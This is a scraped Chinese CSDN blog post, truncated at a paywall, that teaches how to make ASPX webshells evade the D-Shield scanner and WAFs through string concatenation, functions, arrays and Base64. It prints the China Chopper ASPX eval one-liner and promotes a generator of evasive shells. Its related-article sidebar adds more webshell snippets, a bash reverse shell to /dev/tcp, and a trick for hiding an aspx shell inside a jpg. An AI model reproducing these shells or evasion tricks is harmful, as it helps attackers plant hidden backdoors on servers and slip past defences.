无限免杀D盾脚本之aspx ——yzddMr6

最新推荐文章于 2024-08-20 16:19:30 发布
最新推荐文章于 2024-08-20 16:19:30 发布
阅读量3.5k 收藏 3
点赞数 2
个人星球:https://yzddmr6.tk/zsxq/
本文链接:https://blog.csdn.net/qq_43147039/article/details/103161190
版权
本文介绍了如何针对ASP.NET Web应用程序构造免杀的WebShell,重点讨论了Jscript的使用、字符串拼接、数组声明、函数及BASE64编码在免杀中的应用。通过这些技巧,可以有效地绕过WAF的检测,实现ASPx的免杀。作者分享了一个生成免杀ASPx webshell的脚本,托管在GitHub的webshell_venom项目中。
摘要由CSDN通过智能技术生成

前言

自己曾经写过一篇文章:利用随机异或无限免杀某盾

php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.

因为aspx的权限一般较大,对于渗透过程中还是很重要的, 所以就想着写一篇文章来简单的介绍下aspx的免杀

0x01 主要方法

字符串拼接
函数
数组
Base64编码

0x02 了解aspx一句话

Aspx的一句话一般是使用Jscript语言实现

看看原本的菜刀aspx一句话

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

其实与php的类似
Eval函数将字符串当做代码执行
不同的是在Jscript中为了安全起见必须使用unsafe参数,才可以使其具有对操作系统操作的功能

Request.Item["pass"] 的pass就是接受的参数 类似于php的$_POST[“pass”]

Jscript基本用法

Function xxx(){}//声明一个函数

字符串拼接

Var a =’a’+’b’;//a=’ab’;
Var a= ‘\x61’; //a=’a’;

数组声明

Var a=’abc’;
Var b=a(0);//b=’a’;

作为免杀来说一般waf杀的都是unsafe这个参数,所以我们的免杀也将从这个参数下手

0x02 字符串拼接

经过测试,一般来说把’unsafe’这个字符串无论是十六进制拼接还是直接大小写拼接均

最低0.47元/天 解锁文章
yzddMr6
关注
shell 免杀aspx_记一次aspx网站渗透
weixin_42128141的博客
12-29 1573
通过前期信息搜集获取到目标站的80xx端口发现一处源码泄露查看配置文件登录manage.aspx上传shell发现安装了TeamViewer看下进程如果运行tv的话,可直接读取其远程的账号密码https://github.com/uknowsec/SharpDecryptPwdSharpDecryptPwd对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,T...
shell 免杀aspx_免杀 webshell 小叙 [ 一 ]
weixin_39607798的博客
01-13 533
0x01 基于各类常规命令和代码执行函数的花样变形[如,拆分重组,动态执行,以此来躲避静态特征检测],不过像有些高危函数默认就会被运维们禁掉,甚至高版本的php默认已经不让执行[如,php7],万一再开了安全模式,就又有点儿费劲了php中一些常见的执行类型函数:system()exec()shell_exec()passthru()proc_open()`` 反引号执行系统命令...利用rot13...
ASP.NET下Webshell编译产物免杀
最新发布
2401_83799022的博客
08-20 380
但编译产物会被杀导致无法连接webshell,以冰蝎aspx的webshell为例。Webshell的文件免杀可参考以下链接,通过unicode编码就可以实现。通过dnspy反编译和不断测试,以下方法的变换对于编译产物而言没有任何影响。但当有卡巴斯基等杀软时,虽然aspx、ashx、asmx文件没有被杀。7、字符串常量的拼接,如"Load"替换为"Lo"+"ad"为了保证aspx的免杀,仍使用unicode编码。通过变异的base64来编码字符串常量,如。1、unicode编码。
shell 免杀aspx_避开eval关键字,打造免杀一句话木马
weixin_30304773的博客
01-16 1961
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?首先我想到的是将eval从字符串类型赋给一个变量。如:$func = 'phpinfo';$func();这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想...
shell 免杀aspx_发个免杀修改的aspx提权马
weixin_35559202的博客
12-31 411
htmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">protectedvoidPage_load(objectsender,EventArgse){stringok=Request.QueryString["s...
shell 免杀aspx_发个免杀修改的aspx提权马qingshell.aspx
weixin_35795675的博客
01-30 609
protected void Page_load(object sender,EventArgs e){string ok = Request.QueryString["sb"];string shell= Request.QueryString["shell"];//www.moonsec.com moonResponse.Write(shell + ok );Response.Write(""...
一键免杀D盾(免杀一句话无限生成) ——yzddMr6
yzddMr6的博客
11-06 1632
前言 最近逛帖子发现好多人还在找各种免杀一句话。。。 都9102年了 都不知道有webshell-venom这个东西吗。。。 看来我的宣传还是不到位。。。 再给大家介绍一下吧 项目地址: https://github.com/yzddmr6/webshell-venom 蚁剑插件版: https://github.com/yzddmr6/as_webshell_venom 自己几个...
反弹Shell升级为交互式Shell ——yzddMr6
yzddMr6的博客
12-03 2523
前言 看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。 然后一顿操作把一个简单的shell就升级到了一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 首先ubuntu建一个新用户:test,密码 test 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168...
WebCrack:一键自动化日站工具 ——yzddMr6
yzddMr6的博客
11-19 1879
前言 当初日学校内网的时候有很多后台,就想着能不能批量检测一下弱口令 但是学校的后台系统种类很多,asp aspx php jsp 等等 因为单个网站的爆破比较好整,直接上burp或者py脚本或者hydra 好像还没有听说过批量工具 想着找一找有没有现成的工具能测一测。 还真发现github上有一个 https://github.com/TideSec/web_pwd_common...
shell脚本——自动杀死进程
10-25
Linux系统下自动匹配进程号,并杀死进程的shell脚本...
aspxwebshell免杀过杀软亲自制作
10-29
亲自制作绝对过任何杀软360,node32等aspxwebshell,已生成图片格式,你看到的是一个图片jpg文件,把后缀名改为aspx格式传上去的就是一个aspxwebshell,实现进程管理,数据库管理,文件管理,端口映射,命令行等功能,附源码生成命令copy f.jpg/b +x.aspx/a hez.jpg
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
绕过D盾D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
第六十六课:借助aspx对payload进行分离免杀1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 661
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
shell 免杀aspx_webshell免杀套路
weixin_28767943的博客
01-30 680
0x01 前言尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧0x02 目录关于eval 与 assert字符串变形定义函数绕过回调函数回调函数变形特殊字符干扰数组类编码绕过无字符特征马PHP7.1后webshell何去何从总结0x03 关于eval 于 assert关于eval函数在php给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用 可变函数:通...
python 递增后循环_python在循环中任意递增迭代器
weixin_30039755的博客
12-23 526
Python中有一个很棒的包,名为^{}。但在我开始讨论之前,解释一下迭代协议是如何在Python中实现的会很有帮助。如果要在容器上提供迭代,可以指定提供iterator type的^{}类方法。"Understanding Python's 'for' statement"是一篇很好的文章,介绍了for-in语句在Python中的实际工作方式,并对迭代器类型的工作方式进行了很好的概述。请看以下内...
shell 免杀aspx_绕过WebShell检测的总结之文件免杀
weixin_31124869的博客
12-31 577
WAF会维护一个规则库记录webshell常用的函数、方法、结构,当匹配上对应特征时便发出警告、直接封禁或隔离。但是安全厂商们为了提升用户体验,一般会以可用性为首要目标,其次才是安全性,这是一个硬伤也是绕过的基础由于正常业务功能的需要,WAF通常并不会全盘枪毙语言中可以执行代码的结构或函数(比如eval),而是判断敏感函数是否处于某种木马后门常用且业务功能不常用的结构中,绕过即是找出既能达到目的又...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值